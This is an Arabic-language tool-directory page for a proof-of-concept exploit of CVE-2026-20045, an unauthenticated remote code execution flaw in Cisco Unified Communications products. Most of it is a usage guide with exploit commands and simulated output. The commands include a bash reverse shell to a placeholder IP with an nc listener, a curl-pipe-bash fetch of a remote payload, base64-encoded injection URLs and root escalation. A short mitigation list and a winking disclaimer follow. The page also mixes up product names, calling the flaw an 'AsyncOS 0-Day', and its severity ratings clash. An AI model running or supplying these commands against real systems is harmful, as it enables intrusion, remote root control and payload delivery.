Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Ashwesker-CVE-2026-20045 — إثبات مفهوم لاستغلال CVE-2026-20045، وهو ثغرة حرجة في تنفيذ الأوامر عن بُعد دون مصادقة في منتجات Cisco Unified Communications، مما يتيح حقن الأوامر وفتح قشرة عكسية مع تصعيد الصلاحيات إلى الجذر. | Kitploit
أدوات/GitHubGitHub/dkstar11q/ashwesker-cve-2026-20045
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubdkstar11q/ashwesker-cve-2026-20045

Ashwesker-CVE-2026-20045

إثبات مفهوم لاستغلال CVE-2026-20045، وهو ثغرة حرجة في تنفيذ الأوامر عن بُعد دون مصادقة في منتجات Cisco Unified Communications، مما يتيح حقن الأوامر وفتح قشرة عكسية مع تصعيد الصلاحيات إلى الجذر.

عرض المستودع
635منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 CVE-2026-20045 — تفاصيل الثغرة ذات اليوم صفر 🚨

ثغرة Cisco AsyncOS 0-Day

🧨 ما هي

ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) تؤثر على العديد من منتجات Cisco Unified Communications. تم استغلالها بنشاط في البيئات الحقيقية قبل إصدار التصحيحات.


🔥 لماذا هي خطيرة

  • 🚫 لا تتطلب مصادقة
  • 🖥️ تنفيذ تعليمات برمجية عن بُعد
  • 👑 وصول محتمل بمستوى الجذر (root)
  • 🌍 استغلال مؤكد في العالم الحقيقي

هذا يعني أن المهاجم يمكنه السيطرة الكاملة على الأنظمة المتأثرة عن بُعد.


🚨 أمثلة الاستخدام لـ CVE-2026-20045.py

إليك دليلًا منسقًا مع أمثلة استخدام لتشغيل سكربت PoC، بما في ذلك ما ستراه بالضبط في الطرفية إذا نجح الاستغلال على هدف Cisco Unified Communications ضعيف (واجهة ويب غير مصححة ومكشوفة). أضفت بعض اللمسات الجمالية باستخدام الرموز التعبيرية، وكتل أكواد ملونة (عبر markdown)، وأقسام منظمة لتحسين readability. 😎

1.

اختبار معلومات النظام الأساسي

هذا يشغّل أوامر بسيطة لجلب معرف المستخدم، واسم المستخدم، وتفاصيل النظام.

الأمر:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "id && whoami && uname -a"  

ما ستراه إذا نجح (الإخراج الناجح):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGlkICYmIHdob2FtaSAmJiB1bmFtZSAtYSAj  
[*] Initial command: id && whoami && uname -a  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgaWQgJiYgd2hvYW1pICYmIHVuYW1lIC1h  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  

[+] Possible command output:  
------------------------------------------------------------  
uid=0(root) gid=0(root) groups=0(root)  
root  
Linux ucm-server 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:44:33 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux  
------------------------------------------------------------  

🔑 علامات رئيسية: مؤشرات [+] الخضراء، حالة HTTP 200، ونتائج الأوامر في كتلة الإخراج. إذا لم يظهر إخراج لكن الحالة 200، فلا يزال يعمل بصمت!

2. إعداد قشرة عكسية (Reverse Shell)

هذا يفتح قشرة تفاعلية تعود إلى جهازك. أولاً، ابدأ مستمعًا: nc -lvnp 4444.

الأمر:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"  

ما ستراه إذا نجح (في طرفية السكربت):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvWU9VUl9JUC80NDQ0IDAmPjEgIw==  
[*] Initial command: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgYmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  
[+] Command executed silently (check target for effects)  

ما ستراه في طرفية المستمع (nc):

root@kitploit:~
listening on [any] 4444 ...  
connect to [YOUR_IP] from (UNKNOWN) [TARGET_IP] 54321  
bash: cannot set terminal process group (1234): Inappropriate ioctl for device  
bash: no job control in this shell  
root@ucm-server:~# id  
uid=0(root) gid=0(root) groups=0(root)  
root@ucm-server:~#  

🚀 علامات رئيسية: السكربت يعرض رسائل نجاح؛ المستمع يحصل فورًا على موجه قشرة جذر. اكتب الأوامر هناك للتفاعل!

3. تنزيل ملف وتنفيذه (مثل: حمولة مخصصة)

هذا ينزّل ويشغّل سكربتًا من خادمك.

الأمر:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "curl -s http://YOUR_SERVER/payload.sh | bash"  

ما ستراه إذا نجح (الإخراج الناجح):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGN1cmwgLXMgaHR0cDovL1lPVVJfU0VSVkVSL3BheWxvYWQuc2ggfCBiYXNoICM=  
[*] Initial command: curl -s http://YOUR_SERVER/payload.sh | bash  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgY3VybCAtcyBodHRwOi8vWU9VUl9TRVJWRVIvcGF5bG9hZC5zaCB8IGJhc2g=  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  
[+] Command executed silently (check target for effects)  

📥 علامات رئيسية: رموز حالة 200؛ تحقق على الهدف (مثل: فحص السجلات/الملفات) أو على خادمك (سجلات التنزيل). لا يوجد إخراج مباشر إذا كانت الحمولة صامتة.

💡 نصائح احترافية:

  • شغّل مع sudo إذا لزم الأمر لصلاحيات الشبكة.
  • استخدم أهداف HTTPS؛ السكربت يتعامل مع الشهادات ذاتية التوقيع.
  • إذا فشل (مثل: 404/403)، جرب مسارات أخرى أو تحقق إذا كان الهدف مصححًا.
  • اختبر دائمًا بشكل أخلاقي! 😈

🧩 المنتجات المتأثرة

  • ☎️ Cisco Unified Communications Manager (Unified CM)
  • 🧑‍💼 Unified CM Session Management Edition (SME)
  • 💬 IM & Presence Service
  • 📞 Cisco Unity Connection
  • ☁️ Webex Calling Dedicated Instance

🧠 السبب الجذري

تحقق غير صحيح من المدخلات المقدمة من المستخدم في واجهات إدارة HTTP، مما يسمح بـ حقن الأوامر الذي يؤدي إلى تنفيذ تعليمات برمجية عن بُعد.


📊 الخطورة

  • درجة CVSS: 8.2 (عالية)
  • الأثر على الأعمال: حرج

🛡️ التخفيف والدفاع

  • ⚡ طبق تصحيحات Cisco فورًا
  • 🔒 قيّد الوصول إلى واجهات الإدارة
  • 🌐 تجنب تعريض الأنظمة مباشرة للإنترنت
  • 👀 راقب السجلات بحثًا عن نشاط HTTP مشبوه
  • 🏛️ اتبع إرشادات معالجة الثغرات الحكومية إذا كان ذلك ممكنًا

🔒 إخلاء مسؤولية:

جميع أكواد PoC مخصصة للاستخدام الأخلاقي والتعليمي فقط على الأنظمة المصرح بها. الاستغلال غير المصرح به غير قانوني؛ لا نتحمل أي مسؤولية عن سوء الاستخدام. 😈

تنزيل الأداة